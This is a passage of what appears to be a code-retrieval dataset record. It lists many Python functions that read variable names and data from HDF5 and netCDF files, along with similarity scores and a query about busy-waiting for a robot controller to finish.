vars_name = list(gid.keys())\n\n data = {}\n for var_name in vars_name:\n try:\n dset = gid.get(var_name)\n shape = dset.shape\n data[var_name] = np.zeros(shape)\n dset.read_direct(data[var_name])\n except:\n pass\n fid.close()\n print('Read from ', ''.join((filename,'/',gname)))\n print('Variables names = ')\n print('\\n'.join(vars_name))\n\n return data, vars_name", "def getOeiVarNames( self ):\n\n if self.oeiVarNames:\n return self.oeiVarNames.keys()\n\n n = self.adb.get( \"nOeiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oeiVarName\",\n indx ) \n self.oeiVarNames[name] = indx\n\n return self.oeiVarNames.keys()", "def variables(model: Model) -> AbstractSet[str]:\r\n assert is_model(model)\r\n return model.keys()", "def getVariableList(dataset):\n variables = [v for v in dataset.variables.keys() if v not in dataset.dimensions.keys()]\n for d in dataset.dimensions.keys():\n try:\n variables.pop(variables.index(dataset.variables[d].getncattr(\"bounds\")))\n except:\n pass\n return variables", "def variables(model: Model) -> AbstractSet[str]:\n assert is_model(model)\n return model.keys()", "def variables(self):\n return [i.name for i in self.inputs + self.outputs]", "def get_element_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_elem_var\"][:]]", "def get_variable_names(self):\n return [VariableString(s) for s in\n self._design.GetVariables()+self._design.GetPostProcessingVariables()]", "def variables(self):\n return self.dataset.data_vars", "def getLinIterVarNames( self ):\n\n self.updateAdb( )\n\n return self.iterNames.keys()", "def vars(self):\n return [Var(i,self.dims[i]) for i in range(self.nvar)] # TODO: use stored state info (=1 sometimes)", "def getOfcVarNames( self ):\n\n if self.ofcVarNames:\n return self.ofcVarNames.keys()\n \n n = self.adb.get( \"nOfcVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"ofcVarName\",\n indx ) \n self.ofcVarNames[name] = indx\n\n return self.ofcVarNames.keys()", "def get_layer_var_names(self):\n return(self.params)", "def get_all_variables_names(self):\n return self.project.get_variable_names() + self.design.get_variable_names()", "def getResRatioVarNames( self ):\n\n self.updateAdb( )\n\n return self.resNames.keys()", "def getOriVarNames( self ):\n\n if self.oriVarNames:\n return self.oriVarNames.keys()\n\n n = self.adb.get( \"nOriVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oriVarName\",\n indx ) \n self.oriVarNames[name] = indx\n\n return self.oriVarNames.keys()", "def getDataVariableNames(self, product):\r\n return []", "def getDataVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, DATA_VARIABLE_NAMES_60m)", "def getSolRatioVarNames( self ):\n\n self.updateAdb( )\n\n return self.solNames.keys()", "def get_variable_names(filepath):\n variables = set()\n with open(filepath, \"r\") as f:\n previous = \"\"\n for line in f.readlines():\n if line[0] == \"#\":\n previous = line\n var_names = None\n continue\n if var_names is not None:\n continue\n var_names = previous.split()[1:]\n while \"vs\" in var_names:\n var_names.remove(\"vs\")\n for name in var_names:\n variables.add(name)\n return list(variables)", "def get_variable_attributes(model_data, header, variable, variable_name):\n header.append('# {}_column: {}\\n'.format(variable, variable_name))\n for attr, value in vars(model_data.variables[variable]).items():\n if '_range' in attr:\n header.append('# {}_{}: {},{}\\n'.format(variable, attr, value[0], value[1]))\n else:\n header.append('# {}_{}: {}\\n'.format(variable, attr, value))\n return header", "def get_variables(self) -> np.array:\n pass", "def get_variable_names(self):\n varNames = []\n for var in self.variables:\n # EstimationVariable\n varNames.append(var.name)\n return varNames", "def getOqiVarNames( self ):\n\n if self.oqiVarNames:\n return self.oqiVarNames.keys()\n\n n = self.adb.get( \"nOqiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"oqiVarName\",\n indx ) \n self.oqiVarNames[name] = indx\n\n return self.oqiVarNames.keys()", "def read_h5(self):\n infile = h5py.File(self.inf_name,'r')\n\n vardict = self.labdict\n #store data with the correct labels\n for k in infile['plasma/1d'].keys():\n try:\n vardict[k] = infile[self.labdict[k]].value\n except:\n vardict[k] = []\n\n vardict['a_ions']=infile['/plasma/anum'].value\n vardict['znum']=infile['/plasma/znum'].value\n \n\n self.rho_in = vardict['rho']\n self._rho_vol = infile['distributions/rhoDist/abscissae/dim1'].value[1:]\n self._volumes = infile['distributions/rhoDist/shellVolume'].value\n self.nrho_in = np.size(self.rho_in)\n\n if vardict['a_ions'][0]!='/':\n self.nspec = len(vardict['a_ions'])\n else:\n self.nspec = vardict['ni'].shape[1]\n print(\"Number of ions: \", self.nspec)\n if len(vardict['a_ions'])!=len(vardict['znum']):\n print(\"ERROR! array of A and Z don't have the same length\")\n\n self.A = vardict['a_ions']\n self.Z = vardict['znum']\n self.nion = self.nspec\n \n self.te_in = vardict['te'][:]\n self.ne_in = vardict['ne'][:]\n self.ti_in = vardict['ti'][:]\n ni1_in = vardict['ni'][:,0]\n self.ni_in = np.zeros((self.nion, self.nrho_in),dtype=float)\n self.ni_in[0,:] = ni1_in\n if self.nion==2:\n ni2_in = vardict['ni'][:,1]\n self.ni_in[1,:] = ni2_in\n elif self.nion==3:\n ni2_in = vardict['ni'][:,1]\n ni3_in = vardict['ni'][:,2]\n self.ni_in[1,:] = ni2_in\n self.ni_in[2,:] = ni3_in\n\n try:\n self.vt_in = vardict['vtor']\n except:\n self.vt_in = np.zeros(self.nrho_in,dtype=float)\n\n try:\n self.zeff_in = vardict['zeff'][:]\n except:\n self.zeff_in = np.zeros(self.nrho_in,dtype=float)\n\n self.ni = np.zeros((self.nion, self.nrho),dtype = float)\n self.spline()", "def get_2Darray_hdf5(file,cols='Null',nrows='Null',verbose=False):\n if verbose:\n print (\"reading data from hdf5 file {} for filters:\".format(file))\n for col in cols:\n print(col)\n df = pd.read_hdf(file,\"df\")\n smalldf = df.loc[:,cols]\n outarray = smalldf.values #if we switch to pandas 0.24 or higher\n #this could be replaced with smalldf.to_numpy()\n return outarray", "def keys(self):\n keys = set()\n with pd.HDFStore(self.rootpath, mode=\"r\") as hdf:\n hdf5_keys = hdf.keys()\n\n for key in hdf5_keys:\n kp = key.split(\"/\")\n if len(kp) == 5:\n print(kp, len(kp))\n keys.add(kp[4])\n return list(keys)", "def getGridFilenames(self):\n c = list(self.gridVars.keys())\n return self.gridVars[c[0]]", "def get_vars_header(lfile):\n # Get variable list\n vlist = []\n with open(lfile) as fh:\n for line in fh:\n vlist.append(line.split()[-1])\n # Get extension\n ext = \".h5\"\n if vlist[0] == \"ASCII\":\n ext = \".csv\"\n elif vlist[0] == \"HDF5\":\n ext = \".h5\"\n else: # Unsupported type\n pass\n return vlist[1:], ext # First line is a header line of sorts", "def variables(self):\n return [term.variable for term in self.terms]", "def labels(self):\n with self._h5file('r') as h5file:\n return list(h5file.keys())", "def get_data_hdf(file):\n data = {}\n\n def func(name, dset):\n if not hasattr(dset, 'shape'):\n return # not array, can't be image\n if isinstance(dset, h5py.Dataset):\n data[dset.name] = dset.name\n\n file_h5 = h5py.File(file, 'r')\n file_h5.visititems(func)\n return file_h5, data", "def read_vs_1d(vname, depth): \n with open(vname, 'r') as f:\n lines = f.readlines() \n line0=lines[0].split()\n n_col = int(line0[0])\n \n data = []\n\n for line in lines[1:]:\n data.append([float(val) for val in line.split()])\n\n data = np.concatenate(data) \n v_mod = data.reshape([n_col,6])\n \n depth_ref = 0\n for i in range(0, n_col):\n depth_ref = depth_ref+v_mod[i,0]\n #print(depth_ref)\n if(depth_ref>depth):\n vs_1d = v_mod[i-1,2]\n rho_1d = v_mod[i-1,3] \n break\n \n return vs_1d, rho_1d", "def get_name_list(msh, varname):\n return [str(chartostring(v)) for v in msh.variables[varname]]", "def getSensorVariableNames(self, product):\r\n\r\n return []", "def list_of_vars_in_e3sm_diags():\n\n # Get all of the 'variables' parameter from each file.\n vars_used = []\n try:\n logger.info(\"Using user arguments.\")\n parameters = get_parameters(parser)\n except Exception as e:\n logger.error(e)\n # Looks for these files in their installed location.\n pth = os.path.join(e3sm_diags.INSTALL_PATH)\n # The first '*' is the folder of the set, the second is the actual file.\n # Ex: {e3sm_diags.INSTALL_PATH}/lat_lon/lat_lon_model_vs_obs.cfg\n file_paths = [p for p in glob.glob(pth + \"*/*.cfg\")]\n # NOT NEEDED:\n # parser.add_argument('path') # Needed so the filename can be passed in.\n # parser.add_args_and_values([DUMMY_FILE_PATH])\n parameters = parser.get_cfg_parameters(\n files_to_open=file_paths, check_values=False\n )\n\n for p in parameters:\n logger.info(f\"p.variables {p.variables}\")\n vars_used.extend(p.variables)\n\n logger.info(f\"Variables used: {sorted(list(set(vars_used)))}\")\n return set(vars_used)", "def get_output_names(hf):\n return sorted(map(str, hf['/output/data'].keys()))", "def variables(self):\n return [i for (i, j) in self.qubo.keys() if i == j]", "def getSensorVariableNames(self, product):\r\n return []", "def read_data(path):\n with h5py.File(path, 'r') as hf:\t\n input_ = np.array(hf.get('input'))\n label_ = np.array(hf.get('label'))\n return input_, label_", "def variables(self):\r\n return self.get_field('variable')", "def list(self):\n if self.handle == None: return []\n return self.handle.variables.keys()", "def read_hdf5(ID_images:str, path:str = \"data/dataset/\"):\n images, labels = [], []\n\n #open the HDF5 file\n file = h5py.File(path +ID_images+\"_lens.h5\", \"r\")\n\n images = np.array(file[\"/images\"]).astype(\"float64\")\n labels = pd.read_hdf(path +ID_images+'_meta.h5', \"table\")\n\n return images, labels", "def globvardimvals(tmpl, valuesdict,sufs=['.001.001.meta', '.meta']):\n # remove formats: {xx:yy} -> {xx}\n tmpl = re.sub(r'{([^:}]*)(:[^}]*)?}', r'{\\1}', tmpl)\n\n fields = list(set(re.findall(r'{([^}]*)}', tmpl)))\n vardims = [k for k in fields if k.startswith('v')]\n vardims.sort()\n knownvars = dict((k,v) for k,v in valuesdict.items() if k in vardims)\n knownvardims = [ k for k in vardims if k in knownvars ]\n knownvarvals = [ knownvars[k] for k in knownvardims ]\n knownvarlens = [ len(v) for v in knownvarvals ]\n unknownvardims = [ k for k in vardims if not k in knownvars ]\n\n fixdims = [k for k in fields if not k.startswith('v')]\n fixdims.sort()\n\n # just pick actual fields\n known = dict((k,v) for k,v in valuesdict.items() if k in fields)\n knowndims = dict((k,v) for k,v in known.items() if k not in vardims)\n # first known value for each field\n firstdims = dict((k,v[0]) for k,v in knowndims.items())\n\n if 'vars' in valuesdict:\n # list of variable value tuples\n # must be all variables; will ignore other v0=... settings\n varvals = valuesdict['vars']\n else:\n knownvarindices = np.indices(knownvarlens)\n varvals = []\n for vi in zip(*[x.flat for x in knownvarindices]):\n varval = tuple(v[i] for v,i in zip(knownvarvals,vi))\n varvals.append(varval)\n\n dimvals = {}\n\n unknown = set(fields) - set(known)\n if unknown:\n replaceknown = dict((k,'{'+k+'}') for k in fields)\n for k,v in firstdims.items():\n replaceknown[k] = v\n\n for knownvarval in varvals:\n vars = dict(zip(knownvardims, knownvarval))\n replaceknown.update(vars)\n\n unknowntmpl = tmpl.format(**replaceknown)\n\n globpatt = re.sub(r'{[^}]*}', '*', unknowntmpl)\n for suf in sufs:\n metafiles = glob(globpatt + suf)\n if len(metafiles):\n break\n else:\n raise IOError(globpatt + suf)\n\n unknowndims = [k for k in unknown if not k.startswith('v')]\n regexp,parts,keys = format2re(unknowntmpl + suf)\n vals = {}\n for metafile in metafiles:\n g = re.match(regexp,metafile).groups()\n d = dict(zip(keys,g))\n varval = tuple(d[k] for k in unknownvardims)\n if varval not in vals:\n vals[varval] = dict((k,set()) for k in unknowndims)\n for k,v in zip(keys,g):\n if not k.startswith('v'):\n vals[varval][k].add(v)\n\n for unknownvarvals,vs in vals.items():\n unknownvars = dict(zip(unknownvardims,unknownvarvals))\n vars.update(unknownvars)\n varval = tuple(vars[k] for k in vardims)\n dimvals[varval] = dict((k,sorted(list(s))) for k,s in vs.items())\n dimvals[varval].update(knowndims)\n else:\n dimvals = dict.fromkeys(varvals, knowndims)\n \n # res: (v0,v1) -> {'d0':['a','b','c'], 'd1':[0,1,2], ...}\n return vardims,fixdims,dimvals", "def extract_2d_var(self,varname,file_idx):\n if varname in self.predictors:\n file = self.predictor_inventory[varname]['files'][file_idx]\n elif varname in self.predictands:\n file = self.predictand_inventory[varname]['files'][file_idx]\n else:\n raise ValueError(f'{varname} not a predictor or predictand') \n \n return Dataset(file).variables[varname][:]", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n\n data, label=data[:,:,:,0:2], label[:,:,:,0]\n #data=np.expand_dims(data,axis=-1)\n label=np.expand_dims(label,axis=-1)\n\n return data, label", "def variables(self):\n return {u for u in self if u.type == 'var'}", "def get_layers(t_vars):\n if TfUtils._is_op_defined(t_vars):\n return [t_var.name for t_var in t_vars][: len(t_vars) // 2 ]\n return get_unique([t_var.name.split(\"/\")[0] for t_var in t_vars if \"/\" in t_var.name])", "def getVariables(self):\n statVars = [self[vn] for vn in self.statVars]\n timeVars = [self[vn] for vn in self.timeVars]\n return statVars + timeVars", "def getIndVarsTable(self, omitTheseIndVars=()):\n assert all([indVar in self.indVars for indVar in omitTheseIndVars]), \\\n \"Can't omit an indVar that is not a proper indVar!\"\n\n result = []\n for indVar in self.indVars:\n if indVar not in omitTheseIndVars:\n result.append(self.h5file[indVar])\n #returning a tuple prevents inadvertent mutating of the result\n return tuple(result)", "def extract_h5(args, var, data, lfile):\n import h5py\n import numpy as np\n try:\n raw = h5py.File(lfile, 'r')\n except:\n print(\"Error: File could not be read: \" + lfile)\n return\n # Get time\n time = np.array(raw['sys.exec.out.time'])\n # Get data\n for v in var:\n if v not in data: # havent extracted yet\n if v in raw:\n data[v] = np.array(raw[v])\n else:\n # if args.verbose :\n # print \"Warning: \" + v + \" not found in \" +\n # os.path.basename(lfile)\n continue\n else:\n continue # already extracted\n raw.close()\n return data, time", "def get_keys(self, file_name):\n\n nc = Dataset(file_name)\n keylist = []\n for key in nc.variables.keys():\n if ((not key == \"time\") and (not key == \"grid\")):\n keylist.append(key)\n\n nc.close()\n return keylist", "def variables(self):\n return np.array(list(self._match_result_dict.keys()))", "def get_global_variable_names(self):\n return [b\"\".join(_i).strip().decode()\n for _i in self._f.variables[\"name_glo_var\"][:]]", "def printvarindex(fname):\n cursor = eplussql.getcursor(fname)\n mtx1 = eplussql.get_varindex(cursor)\n mtx2 = [[str(item) for item in row] for row in mtx1]\n mtx3 = [','.join(row) for row in mtx2]\n for row in mtx3:\n print row", "def values(self):\n vals = []\n narrays = self.VTKObject.GetNumberOfArrays()\n for i in range(narrays):\n a = self.VTKObject.GetAbstractArray(i)\n if a.GetName():\n vals.append(a)\n return vals", "def read_nc_var(nc_file, var_name, var_date_name):\n \n fh = Dataset(nc_file, mode='r')\n var = fh.variables[var_name][:]\n var_dates = fh.variables[var_date_name][:]\n \n print(var_name,': ', var.shape)\n print(var_date_name,': ', var_dates.shape)\n \n return var, var_dates;", "def names(self):\n labels = [\n \"$X_{%i}$\" % i if d.name is None else d.name\n for i, d in enumerate(self.dimensions)\n ]\n return labels", "def variables(self):\n for name in self._nodes:\n if isinstance(self._nodes[name], RandomVariable):\n yield name", "def stats_variable_names(res):\n def varname(s):\n pos = s.find(':')\n return s if pos==-1 else s[0:pos]\n return set( [ varname(key) for key in res.keys()] )", "def mesh_names(self):\n meshes = []\n for vname in self.nc.variables.keys():\n try:\n if self.nc.variables[vname].cf_role == 'mesh_topology':\n meshes.append(vname)\n except AttributeError:\n pass\n return meshes", "def varNames(self):\n return self.__varNames", "def variable_names(self):\n\n status, stdout, stderr = self.__xcall__(['--print-variables'])\n\n if status != 0:\n raise RuntimeError(\"error querying --print-variables for package `%s': %s\" % (self.name, stderr))\n\n return stdout.strip().split()", "def getMaskVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, MASK_VARIABLE_NAMES_60m)", "def variables_used (self) :\r\n\t\treturn [i[0] for i in self.parameters]", "def var_names(self):\n return self._var_names", "def get_mds_dimension_names(node):\n ndims=len(get_mds_shape(node))\n own_name=get_mds_shortname(node)\n dimension_names=[]\n for i in range(ndims):\n dimension=node.dim_of(i)\n try:\n name=get_mds_shortname(get_mds_node_reference(dimension))\n if len(get_mds_shape(dimension))>1:\n name=name+\"_index\"\n except:\n name=own_name+\"_index\"\n dimension_names.append(name)\n return dimension_names", "def getVariableNames(self, product):\r\n\r\n variable_names = self.getDataVariableNames(product) + \\\r\n self.getMaskVariableNames(product) + \\\r\n self.getMeteorologicalVariableNames(product) + \\\r\n self.getSensorVariableNames(product) + \\\r\n self.getInfoVariableNames(product)\r\n\r\n return variable_names", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def variables(self):\n # created variable from `get_variable`\n allname = [name for _, (name, t) in self._variable_info.iteritems()\n if t == 'variable']\n allvars = [v for v in K.get_all_variables() if v.name in allname]\n # related variables to all `Tensor`\n tensors = [self.get_variable(name)\n for name, (info, t) in self._variable_info.iteritems()\n if t == 'tensor']\n tensors = K.ComputationGraph(tensors).variables\n # all variables within the scope\n scope_vars = K.get_all_variables(scope=self.name)\n return sorted(set(allvars + tensors + scope_vars),\n key=lambda x: x.name)", "def var_name(i, j):\n return \"x_\" + str(i) + \",\" + str(j)", "def getOsiVarNames( self ):\n\n if self.osiVarNames:\n return self.osiVarNames.keys()\n \n n = self.adb.get( \"nOsiVars\" )\n for indx in xrange( n ):\n name = self.adb.get( \"osiVarName\",\n indx ) \n self.osiVarNames[ name ]= indx\n\n return self.osiVarNames.keys()", "def __splitVariableNames(self, name, indexes):\n if name == 'x':\n var = self.xCoordinates[indexes[0]][indexes[1]]\n elif name == 'y':\n var = self.yCoordinates[indexes[0]][indexes[1]]\n elif name == 'z':\n var = self.zCoordinates[indexes[0]][indexes[1]]\n elif name == 'colorMap':\n var = self.colorMapCoordinates[indexes[0]][indexes[1]]\n elif name == 'clusterLabels':\n var = self.clusterLabels[indexes[0]][indexes[1]]\n elif name == 'mixtureLabels':\n var = self.mixtureLabels[indexes[0]][indexes[1]]\n elif name == 'mixtureMeans':\n var = self.mixtureMeans[indexes[0]][indexes[1]]\n elif name == 'mixtureCovars':\n var = self.mixtureCovars[indexes[0]][indexes[1]]\n\n # The variable can contain brackets {} (when the symbol \"|\" is present in\n # the variable name), e.g.:\n # DataName|Input|{RavenAuxiliary|variableName|initial_value}\n # or it can look like:\n # DataName|Input|variableName\n\n if var is not None:\n result = [None] * 3\n if '|input|' in var.lower():\n match = re.search(r\"(\\|input\\|)\", var.lower())\n elif '|output|' in var.lower():\n match = re.search(r\"(\\|output\\|)\", var.lower())\n else:\n self.raiseAnError(IOError, f'In Plot {self.name}, the input coordinate {name} has not specified an \"Input\" or \"Output\" (case insensitive). e.g., sourceName|Input|aVariable) in {var}')\n startLoc, endLoc = match.start(), match.end()\n result = [var[:startLoc].strip(), var[startLoc+1:endLoc-1].strip(), var[endLoc:].strip()]\n if '{' in result[-1] and '}' in result[-1]:\n locLower, locUpper = result[-1].find(\"{\"), result[-1].rfind(\"}\")\n result[-1] = result[-1][locLower + 1:locUpper].strip()\n else:\n result = None\n\n return result", "def _variables_from_set(self, setname):\n sets = self._meta['sets']\n if not setname in sets:\n err = \"'{}' is no valid set name.\".format(setname)\n raise KeyError(err)\n else:\n set_items = sets[setname]['items']\n set_vars = [v.split('@')[-1] for v in set_items]\n return set_vars", "def get_all_variables(self):\n return []", "def getInfoVariableNames(self, product):\r\n\r\n h = product.getSceneRasterHeight()\r\n\r\n # 10m resolution\r\n if h == 10980:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_10m)\r\n\r\n # 20m resolution\r\n elif h == 5490:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_20m)\r\n\r\n # 20m resolution\r\n elif h == 1830:\r\n return self.return_available_variables(product, INFO_VARIABLE_NAMES_60m)\r\n return []", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n return data, label", "def read_data_test(path):\n with h5py.File(path, 'r') as hf:\n input_ = np.array(hf.get('data'))\n label_ = np.array(hf.get('label'))\n\t\n return input_, label_", "def signal_values(filename):\n\n global standard_deviation\n f = h5py.File(filename, 'r')\n grp = np.array(f.get('/model'))\n\n for i in grp:\n ideal_signal_values[str(i[0])[2:-1]] = {cs.VALUE: i[1]}\n standard_deviation = np.array(grp[0][2])\n return ideal_signal_values", "def get_variables(self):\n return [self.g_t, self.m_t]", "def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the z component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[1])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals", "def read_data(path):\n with h5py.File(path, 'r') as hf:\n data = np.array(hf.get('data'))\n label = np.array(hf.get('label'))\n return data, label", "def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the y component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[2])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals", "def getMeteorologicalVariableNames(self, product):\r\n return []", "def read_grid(filename_grid, dim=2, slc=None):\n ## get shape and slice\n fid = h5py.File(filename_grid, 'r')\n if dim==2:\n varnames = ['x', 'y', 'ep']\n if slc is None: slc = np.s_[0,:,:]\n if dim==3:\n varnames = ['x', 'y', 'z', 'ep']\n if slc is None: slc = np.s_[:,:,:]\n\n dset = fid.get(varnames[0])\n shape = dset[slc].shape\n (nx,ny,nz) = dset.shape\n ## read variables\n grid = {}\n for varname in varnames:\n try:\n dset = fid.get(varname)\n grid[varname] = np.zeros(shape)\n dset.read_direct(grid[varname], source_sel=slc)\n grid[varname] = grid[varname].transpose()\n except:\n pass\n fid.close()\n return grid, nx, ny, nz", "def get_all_var_names(self):\n\n if hasattr(self, \"all_var_names\"):\n return self.all_var_names\n\n # Append all variables in model (defined in YAML).\n aux_all_var_names = []\n aux_all_var_names.extend(self.sim_config_params)\n aux_all_var_names.extend(self.sim_inputs)\n aux_all_var_names.extend(self.sim_outputs)\n aux_all_var_names.extend(self.sim_other_vars)\n\n # Remove duplicates (if any) -- Keeping initial order\n all_var_names = [aux_all_var_names[i] for i in range(len(aux_all_var_names)) \\\n if aux_all_var_names[i] not in aux_all_var_names[:i]]\n\n # Store for following calls\n self.all_var_names = all_var_names\n return self.all_var_names", "def extract_var_data(self, var_names):\n variable_dict = {} # Declaring dictionary used to store key-val pairs, var_name as key and the array as the value\n try:\n for var in var_names:\n variable_dict[var] = self.dataset[var].values\n return variable_dict\n except Exception as e:\n print(\"An Error occured:\", e)\n raise e", "def _find_major_vars(data):\n\n # TODO Use an Ordered Set instead to preserve order of variables in files?\n tcoord = data.attrs.get(\"metadata:bout_tdim\", \"t\")\n major_vars = set(\n var\n for var in data.data_vars\n if (tcoord in data[var].dims) and data[var].dims != (tcoord,)\n )\n minor_vars = set(data.data_vars) - set(major_vars)\n return list(major_vars), list(minor_vars)", "def dims_list(self):\n return [n for n in self.schema.names if n in self.dims]", "def printAllColumnsInH5(pathToData):\n\n #Check if a correct path is given\n\n if not os.path.isfile(pathToData):\n raise ValueError(\"h5 file not found. Wrong path given?\")\n elif os.path.isfile(pathToData):\n Data = h5.File(pathToData, 'r')\n\n\n Files = Data.keys()\n\n for File in Files:\n print()\n print('Filename = %s' %(File))\n print('----------------------')\n\n #Every time you see Xr*' '\n #It means I add X spaces to line it\n print('\\t column name%sunit%slength'%(29*' ',16*' '))\n print('\\t '+'-----------------'*4)\n \n #In this file give me all the column names\n columns = Data[File].keys()\n \n #for every column in the columns\n for nrc,column in enumerate(columns):\n #always want the column name printed in 40 char\n spaces = ' '*(40 - len(column))\n length = Data[File][column].shape[0]\n #always want the unit name printed over 20 chars\n unit = Data[File][column].attrs['units']\n spaces2 = ' '*(20 - len(unit))\n #--\n length = Data[File][column].shape[0]\n\n print('\\t %s%s%s%s%s'%(column,spaces, unit,spaces2, length))\n #Every 4 lines print a dashed line to read output easier\n if (nrc%5==4):\n print('\\t '+'-----------------'*4)\n Data.close()", "def _get_columns_h5lmt(self, dataset_name):\n dataset = self.__getitem__(dataset_name)\n orig_dataset_name = dataset_name.lstrip('/')\n dataset_name = dataset.name.lstrip('/')\n if dataset_name == 'MDSOpsGroup/MDSOpsDataSet' and orig_dataset_name != dataset_name:\n return numpy.array([SCHEMA_DATASET_PROVIDERS[None][orig_dataset_name]['args']['column']])\n elif dataset_name in H5LMT_COLUMN_ATTRS:\n return dataset.attrs[H5LMT_COLUMN_ATTRS[dataset_name]].astype('U')\n elif dataset_name == 'MDSCPUGroup/MDSCPUDataSet':\n return numpy.array(['_unknown'])\n elif dataset_name == 'FSMissingGroup/FSMissingDataSet':\n return numpy.array(['_unknown%04d' % i for i in range(dataset.shape[1])])\n else:\n raise KeyError('Unknown h5lmt dataset %s' % dataset_name)", "def get_vars(self):\n return [self.mu, self.var]" ]
[ "0.6690074", "0.62676114", "0.61328524", "0.60728717", "0.6032376", "0.5962701", "0.5961076", "0.5934028", "0.5920969", "0.5817062", "0.57885367", "0.57675433", "0.57535744", "0.5749644", "0.5723075", "0.57072866", "0.56532377", "0.56390136", "0.5622561", "0.56167597", "0.5583233", "0.55704904", "0.5569377", "0.55612564", "0.55557597", "0.55527127", "0.5549425", "0.55294627", "0.5500263", "0.5489356", "0.54658467", "0.5453913", "0.5433182", "0.5415193", "0.5407008", "0.5396658", "0.53921777", "0.5387869", "0.53857964", "0.5381563", "0.5377997", "0.5377066", "0.537511", "0.5374743", "0.5371084", "0.5365715", "0.5358407", "0.53537613", "0.53319097", "0.53278327", "0.5327232", "0.53179884", "0.5296841", "0.5294542", "0.5293324", "0.5286549", "0.5285852", "0.5281259", "0.5271757", "0.5269444", "0.5267832", "0.52645224", "0.52507913", "0.524848", "0.5233697", "0.5230244", "0.52298784", "0.5227499", "0.52164936", "0.52163327", "0.52089024", "0.5206909", "0.5204403", "0.5202284", "0.51878804", "0.5183257", "0.51810324", "0.5175614", "0.51751137", "0.516473", "0.51600826", "0.5156463", "0.5152288", "0.5149624", "0.5149302", "0.514825", "0.51473075", "0.5143423", "0.5139605", "0.51346165", "0.51303166", "0.5110438", "0.51103806", "0.51080567", "0.5105851", "0.5101474", "0.50953305", "0.50903165", "0.5084822", "0.5080864" ]
0.6843741
0
busy wait for robot completion
def waitrobot(robot): while not robot.GetController().IsDone(): time.sleep(0.01)
